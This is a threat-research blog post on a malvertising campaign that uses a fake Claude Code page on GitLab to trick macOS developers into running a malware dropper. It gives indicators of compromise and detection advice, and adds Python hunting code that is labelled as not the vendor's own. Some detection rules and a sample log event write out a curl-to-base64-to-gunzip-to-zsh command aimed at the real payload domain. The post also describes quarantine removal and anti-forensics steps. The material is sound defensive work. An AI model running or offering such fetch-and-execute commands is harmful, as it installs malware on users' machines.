7AI - The Agentic Security Platform - Blog

Claude Fraud Returns: Disrupting a Live Attack and Taking Down Attacker Infrastructure

Written by Phil Royer | Apr 16, 2026 1:01:05 PM

Three weeks ago, the 7AI Threat Research Team published research on Claude Fraud, a malware campaign targeting developers searching for Claude AI tools. The original campaign used malvertising to drive victims to fake landing pages, then delivered the MacSync infostealer on macOS and a trojanized VS Code extension on Windows.

When the original infrastructure was taken down, we predicted that attackers would adapt. Last Thursday, we saw exactly that: a new type of malvertising campaign using GitLab, but wrapping the same storyline, a malicious installation method purporting to be Claude Code.

The Alert

On April 9th, a CrowdStrike detection fired in one of our monitored environments. The alert was MacOSDataObfuscation on a developer workstation. 7AI tracked this back to a user who Googled for "Claude Code" and was promptly misled into an installation process very different from how Anthropic would have done it.

What I found when I investigated was concerning, but unfortunately came as no surprise among all the related threats we have been tracking so far this year. It was an attack with the increasingly common pretext we are calling Claude Fraud, now operating with new infrastructure and refined techniques.

Same idea, new infrastructure

The attackers continue to evolve. Instead of hosting their phishing page on compromised infrastructure or Squarespace (as they did in the original campaign), they had moved to GitLab Pages, where anyone can stand up a simple website with no purchase necessary and have a trusted TLS certificate from day one: this time using claude-code-app.gitlab.io.

Both the page’s name and its content impersonated Claude Code, Anthropic's command-line coding tool. The GitLab account behind it used the username of Kieu Trinh, a Vietnamese actress, as a cover identity.

When a victim clicked on a Google ad for "Claude Code" and reached the phishing page, they were routed through a series of Cloudflare Workers URLs with per-victim subdomains. One victim got bland-cache-0953.kieutrinh509372.workers.dev and another got quiet-frame-7261.kieutrinh146085.workers.dev. The attackers were tracking individual victims through their redirect chain while simultaneously ensuring that one report or Cloudflare takedown wouldn't impact their whole operational infrastructure.

The phishing page used a macOS-specific form of terminal-based social engineering. It displayed what looked like a Terminal command to install Claude Code. When the victim pasted it, of course, they weren't really installing Claude Code; instead, the command was downloading and executing a multi-stage malware dropper.

The Attack Chain

Here's what the curl command actually did:

  1. Stage 1: Downloaded an encoded payload from isgilan.com, a domain registered the same day

  2. Deobfuscation: Base64 decoded, gunzipped, and piped to zsh

  3. Stage 2: Downloaded a binary called helper to /tmp/

  4. Gatekeeper bypass: Removed the macOS quarantine flag with xattr -c

  5. Execution: Ran the helper binary, which spawned a bash shell

  6. VM evasion: Launched an obfuscated AppleScript to check if it was running in a sandbox

  7. Anti-forensics: Killed the Terminal process to destroy the session

The AppleScript payload was clever. It used arithmetic obfuscation, building strings character by character at runtime by subtracting arrays of integers. Doing so ensured that there were no helpful static strings to be discovered in the code. The decoded payload checked the system's hardware serial number against known Apple sandbox serials and searched for VMware, VirtualBox, Parallels, and QEMU signatures, thereby avoiding execution if it found itself inside common sandboxing or virtualization tools.

Ironically, CrowdStrike caught and killed the obfuscated AppleScript process in large part because of the anti-sandboxing techniques. This is what triggered our alert.

What CrowdStrike blocked (and what it didn't)

CrowdStrike's detection was accurate. The kill_process disposition terminated osascript, which prevented the VM evasion check from completing. Because the check failed, the malware's conditional logic interpreted this as "sandbox detected" and aborted the final payload delivery.

But the helper binary itself had already been executed. The pkill Terminal anti-forensics command ran successfully. And the binary, with SHA256 hash ccc77f329745f7fb48605776cf5f51b82301edceaaa9bb273bb8a25e42473d9b, wasn't on VirusTotal.

The block was only partially effective. The malware's own conditional logic is what prevented final payload delivery, not a comprehensive kill chain interruption. If the attackers had distributed different variants to different victims, altering or skipping the sandbox check, the attack might have succeeded.

This is why defense in depth and post-compromise investigations still matter. An alert that says "blocked" doesn't tell you what else ran, and doesn’t guarantee that the rest of your environment is safe.

Scoping the damage

A thorough AI-driven investigation revealed the full scope of the attack. Three hosts in the customer environment had visited the phishing page, not just the one surfaced in the original alert:

  • Host 1 (the compromised machine): First stages of attack chain executed. Helper binary ran.
  • Host 2: Blocked by Zscaler web proxy before the payload could be delivered. DNS resolved the phishing domain, but the connection was terminated. No compromise.
  • Host 3: Visited the phishing page through the full malvertising chain but never pasted the Terminal command. The attack depended on social engineering, and this user didn't fall for it. No compromise.

Taking Down the Infrastructure

With the investigation complete, I moved to disruption.

I reported claude-code-app.gitlab.io to GitLab's abuse team with the full technical details: the attack chain, the payload URLs, the IOCs, and screenshots of the phishing page impersonating Claude Code.

GitLab promptly removed the page. Kudos to the GitLab security team for a fast and effective response!

The attackers' GitLab-based infrastructure is now offline. The payload domain isgilan.com was also reported, but these domains are cheap and disposable. The attackers will register another one tomorrow. The TTPs are what matter.

New IOCs for the Community

Phishing Infrastructure

  • claude-code-app.gitlab.io (GitLab Pages, now taken down)
  • *.workers.dev (Cloudflare Workers, dynamic domain, per-victim tracking)

Payload Delivery

  • isgilan.com (registered 2026-04-09, same-day infrastructure)
  • https://isgilan.com/curl/<UUID> (Stage 1)
  • https://isgilan.com/n8n/update (Stage 2)

Malvertising Chain

  • ads.<high-entropy string>.top

File Indicators

  • SHA256: ccc77f329745f7fb48605776cf5f51b82301edceaaa9bb273bb8a25e42473d9b (helper binary)
  • Path: /tmp/helper

Process Chain to Hunt

Terminal → zsh → curl (to isgilan.com) → base64/gunzip/zsh → curl (helper download) → helper → bash -s → osascript + pkill Terminal

Detection Opportunities

  • curl piped to base64 -D | gunzip | zsh (or bash/sh)
  • xattr -c followed by execution of a binary in /tmp/
  • pkill Terminal executed by a non-interactive parent process
  • osascript with obfuscated payloads spawned from /tmp/ binaries
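The four opportunities above and the process chain listed under "Process Chain to Hunt", as an added example that is not 7AI's code: a small Python hunt over EDR process-start events. The record shape (pid, ppid, image, cmdline) and the sample events are assumptions constructed to mirror the chain in the post; `<UUID>` is kept as the post's own placeholder.

```python
import re
import shlex
from dataclasses import dataclass

@dataclass
class ProcEvent:            # constructed record shape (an assumption, not a vendor schema)
    pid: int
    ppid: int
    image: str              # executable path
    cmdline: str            # full command line as recorded
# Rule 1: curl output base64-decoded, gunzipped and fed straight into a shell.
DECODE_TO_SHELL = re.compile(r"curl\b.*\|\s*base64\s+(?:-D|-d|--decode)\b.*\|\s*gunzip\b.*\|\s*(?:zsh|bash|sh)\b")
# Rule 3: a shell reading its script from stdin (-s) or a string (-c) is not the user's interactive shell.
NONINTERACTIVE_SHELL = re.compile(r"(?:^|/)(?:zsh|bash|sh)\s+-[sc]\b")

def has_tmp_ancestor(ev, by_pid, depth=4):
    """Rule 4 helper: True if any ancestor of ev, up to `depth` levels, is a binary under /tmp/."""
    while depth and ev.ppid in by_pid:
        ev, depth = by_pid[ev.ppid], depth - 1
        if ev.image.startswith("/tmp/"):
            return True
    return False

def hunt(events):
    """Return (rule, pid) for every event matching one of the post's four detection opportunities."""
    by_pid = {e.pid: e for e in events}
    unquarantined = set()   # /tmp paths whose quarantine attribute was cleared with xattr -c
    hits = []
    for ev in sorted(events, key=lambda e: e.pid):   # pid order stands in for start order
        if DECODE_TO_SHELL.search(ev.cmdline):
            hits.append(("curl|base64|gunzip|shell", ev.pid))
        if ev.image.endswith("/xattr") and "-c" in shlex.split(ev.cmdline):
            unquarantined.update(a for a in shlex.split(ev.cmdline) if a.startswith("/tmp/"))
        if ev.image in unquarantined:   # Rule 2: xattr -c followed by execution from /tmp
            hits.append(("xattr -c then exec from /tmp", ev.pid))
        parent = by_pid.get(ev.ppid)
        if ev.image.endswith("/pkill") and "Terminal" in ev.cmdline and parent and NONINTERACTIVE_SHELL.search(parent.cmdline):
            hits.append(("pkill Terminal from non-interactive parent", ev.pid))
        if ev.image.endswith("/osascript") and has_tmp_ancestor(ev, by_pid):
            hits.append(("osascript under /tmp binary", ev.pid))
    return hits

# Constructed sample mirroring the post's chain; <UUID> is kept as the post's own placeholder.
SAMPLE = [
    ProcEvent(102, 1, "/bin/zsh", 'zsh -c "curl -s https://isgilan.com/curl/<UUID> | base64 -D | gunzip | zsh"'),
    ProcEvent(103, 102, "/usr/bin/xattr", "xattr -c /tmp/helper"),
    ProcEvent(104, 102, "/tmp/helper", "/tmp/helper"),
    ProcEvent(105, 104, "/bin/bash", "bash -s"),
    ProcEvent(106, 105, "/usr/bin/osascript", "osascript -e '<obfuscated script>'"),
    ProcEvent(107, 105, "/usr/bin/pkill", "pkill Terminal"),
]
```

Running `hunt(SAMPLE)` fires all four rules; a pkill Terminal whose parent is the user's own login shell (for example a parent cmdline of `-zsh`) is deliberately not reported.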

What This Campaign Teaches Us

The attackers adapt fast. The original Claude Fraud campaign used Anthropic's own artifact infrastructure. When that was taken down, they moved to Squarespace. Now they're on GitLab Pages. They’ll adapt again, so defenders need to be ready.

Per-victim tracking is standard now. The Cloudflare Workers subdomains weren't random. Each victim got a unique URL, which means the attackers can correlate ad clicks to infections. They know which ads are working.

Same-day domain registration is a signal. isgilan.com was registered the same day it was used in an attack. If your DNS telemetry shows connections to domains with registration dates matching the connection date, investigate.
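Both signals above (per-victim Workers hostnames and same-day registration), as an added example that is not 7AI's tooling: a Python triage pass over resolver log lines enriched with a creation-date table. The log line shape, the `REGISTRATIONS` dictionary and the example.com date are assumptions constructed for the example; the isgilan.com date and the Workers hostnames are the ones the post gives.

```python
import re
from collections import defaultdict
from datetime import date, datetime

# Constructed resolver-log line shape (an assumption, not a vendor format): "<ISO timestamp> <client> <qname>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")

# Constructed WHOIS/RDAP enrichment: registrable domain -> creation date.
# isgilan.com's date is the one given in the post; example.com's is a placeholder.
REGISTRATIONS = {"isgilan.com": date(2026, 4, 9), "example.com": date(2000, 1, 1)}

def registrable_domain(fqdn):
    """Last two labels. Production code should use the Public Suffix List (workers.dev is itself a public suffix)."""
    return ".".join(fqdn.lower().rstrip(".").split(".")[-2:])

def triage(log_lines, registrations, max_age_days=0):
    """Return (kind, detail) findings: queries to domains registered within max_age_days of the query,
    and Cloudflare Workers hostnames that no two clients share (the per-victim URL pattern)."""
    findings = []
    workers_clients = defaultdict(set)   # workers.dev hostname -> clients that resolved it
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue   # skip malformed lines rather than abort the hunt
        ts, client, qname = m.groups()
        qdate = datetime.fromisoformat(ts).date()
        created = registrations.get(registrable_domain(qname))
        if created is not None and 0 <= (qdate - created).days <= max_age_days:
            findings.append(("new-domain", f"{client} -> {qname} (registered {created})"))
        if qname.endswith(".workers.dev"):
            workers_clients[qname].add(client)
    singletons = sorted(n for n, c in workers_clients.items() if len(c) == 1)
    if len(singletons) >= 2:   # several Workers hostnames, each seen by exactly one client
        findings.append(("per-victim-workers", singletons))
    return findings

# Constructed sample log; the hostnames are the ones quoted in the post.
SAMPLE_LOG = [
    "2026-04-09T14:02:11 host1 claude-code-app.gitlab.io",
    "2026-04-09T14:02:13 host1 bland-cache-0953.kieutrinh509372.workers.dev",
    "2026-04-09T14:02:20 host1 isgilan.com",
    "2026-04-09T15:10:02 host3 quiet-frame-7261.kieutrinh146085.workers.dev",
    "2026-04-09T15:10:05 host2 example.com",
]
```

Treat the Workers rule as a hunt lead rather than a verdict: two unrelated Workers apps each used by a single person would also match, so review the hits alongside the proxy and EDR telemetry.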

Partial blocks need full investigations. An alert that says "blocked" means something was stopped. It doesn't mean nothing else happened. The helper binary still ran. The anti-forensics command executed. Other users and hosts were impacted by the same campaign. Without the follow-through investigation, you'd never know.

Social engineering is the weak link. Two of three targeted users avoided compromise. One was blocked by a proxy. One simply didn't paste the command. Security awareness training that specifically addresses "paste-jacking" and fake developer tools would have protected the third user too.

Next Steps for Defenders

If you're running a SOC, here's what to do with this intelligence:

  1. Block the IOC domains at your proxy, DNS, or firewall

  2. Hunt for the process chain in your EDR: curl → base64 → gunzip → shell

  3. Monitor for same-day domain registrations in your DNS telemetry

  4. Brief your users on fake Claude Code pages and the risks of pasting commands from untrusted sources

The campaign is still active. The GitLab page is down, but the Google ads are still running. The attackers will find new hosting. Block, hunt, and stay alert.

This research builds on the original Claude Fraud investigation published by the 7AI Threat Research Team on March 17, 2026. Read the original research: Claude Fraud: When Trusted Tools Become the Attack Surface (https://blog.7ai.com/claude-fraud-malware-campaign-ai-developer-tools)

Frequently Asked Questions: Claude Fraud

What is Claude Fraud?

Claude Fraud is an ongoing malware campaign that targets developers searching for Claude AI developer tools. The campaign uses Google Ads malvertising to direct victims to phishing pages that impersonate legitimate Claude products, then uses ClickFix social engineering to trick users into executing malware.

Was the GitLab phishing page taken down?

Yes. After 7AI reported the abuse to GitLab with full technical documentation, GitLab removed the claude-code-app.gitlab.io page. However, the attackers have shown a pattern of quickly standing up replacement infrastructure.

How can I detect this attack in my environment?

Hunt for the process chain: Terminal spawning curl, piped to base64 decode and gunzip, piped to a shell. Also alert on high-entropy Cloudflare domains and curl URLs.

Is this related to the MacSync infostealer?

The original Claude Fraud campaign delivered the MacSync infostealer on macOS. This follow-on attack uses similar TTPs but with a different payload binary. The binary's full capability is unknown because the attack chain was disrupted.